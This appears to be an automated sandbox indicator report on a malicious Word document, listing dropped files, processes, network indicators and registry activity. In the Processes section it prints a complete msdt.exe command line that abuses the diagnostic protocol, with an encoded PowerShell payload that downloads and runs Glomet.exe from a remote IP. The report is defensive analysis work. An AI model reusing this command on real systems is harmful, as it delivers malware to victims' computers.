IOC Report
20220714 DWG.doc

loading gif

Files

File Path
Type
Category
Malicious
20220714 DWG.doc
Zip archive data, at least v2.0 to extract
initial sample
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\20220714 DWG.doc.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:53 2022, mtime=Fri Jul 15 21:26:43 2022, atime=Fri Jul 15 21:26:30 2022, length=952586, window=hide
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\678899CC.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E503F16F.png
PNG image data, 2317 x 3433, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FF013E73.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3F734575-446A-409F-ABF0-279D9EE55D72}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D2D7FF17-FD00-4D6F-9BD0-D27E7B55D2C5}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Glomet[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
C:\Users\user\AppData\Local\Temp\RES216A.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES3EE5.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RESDEDE.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$220714 DWG.doc
data
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Adventure_7.bmp
JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\BLINDERS.PAR
data
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\application-x-firmware-symbolic.symbolic.png
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\battery-level-90-charging-symbolic.svg
SVG Scalable Vector Graphics image
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1\network-vpn-acquiring-symbolic.symbolic.png
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\Green_Leaves_9.bmp
JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\document-revert-symbolic.svg
SVG Scalable Vector Graphics image
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\folder-remote-symbolic.svg
SVG Scalable Vector Graphics image
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\folder-remote.png
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\format-text-direction-symbolic-rtl.svg
SVG Scalable Vector Graphics image
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\go-next-symbolic-rtl.svg
SVG Scalable Vector Graphics image
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\input-gaming-symbolic.svg
SVG Scalable Vector Graphics image
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\network-cellular-4g-symbolic.svg
SVG Scalable Vector Graphics image
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\network-server.png
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\immittance\tittes\RETSLRDE.Dia
ASCII text, with very long lines, with no line terminators
dropped
C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{8A06192A-30A6-47D1-ADF8-054AC9F6B663}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5D1B35F5-C171-4718-AE70-CD91AAB04010}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Glomet[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2264EBF3.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6387B6EF.png
PNG image data, 2317 x 3433, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72919526.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3BCD92F0-1C3B-4D0C-AD4B-E4107D6CB424}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2D922950-B6AB-4AD8-83F9-D5771B48C810}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45930AE1-8162-4D9A-BE35-4DB39144DF11}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\{728775D7-78F7-46CF-AD44-B53E52FE2573}
data
dropped
C:\Users\user\AppData\Local\Temp\{925F4F9C-7A22-47FE-BE3A-D6DAAFE95668}
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\20220714 DWG.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:55 2022, mtime=Tue Mar 8 15:45:55 2022, atime=Fri Jul 15 21:18:16 2022, length=952586, window=hide
dropped
There are 59 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
malicious
C:\ProgramData\Glomet.exe
"C:\programdata\Glomet.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
CMD.EXE /C SET /A "0x00^75"
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://bugs.launchpad.net/ubuntu/
unknown
http://45.141.237.18/icons/ubuntu-logo.png
45.141.237.18
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
http://creativecommons.org/ns#DerivativeWorks
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
http://creativecommons.org/licenses/by-sa/4.0/
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
http://45.141.237.18/Glomet.html
45.141.237.18
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
https://store.office.cn/addinstemplate
unknown
https://api.aadrm.com
unknown
http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
http://creativecommons.org/ns#ShareAlike
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
http://nsis.sf.net/NSIS_Error
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
http://creativecommons.org/ns#Notice
unknown
http://creativecommons.org/ns#Reproduction
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://messaging.lifecycle.office.com/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
http://creativecommons.org/ns#Distribution
unknown
https://launchpad.net/bugs/1288690
unknown
https://management.azure.com/
unknown
http://45.141.237.18/Glomet.htmlyX
unknown
There are 91 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
192.168.2.1
unknown
unknown
45.141.237.18
unknown
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
9/:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
:/:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
v2:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
{9:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\22EA8
22EA8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2B6C4
2B6C4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutosaveInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
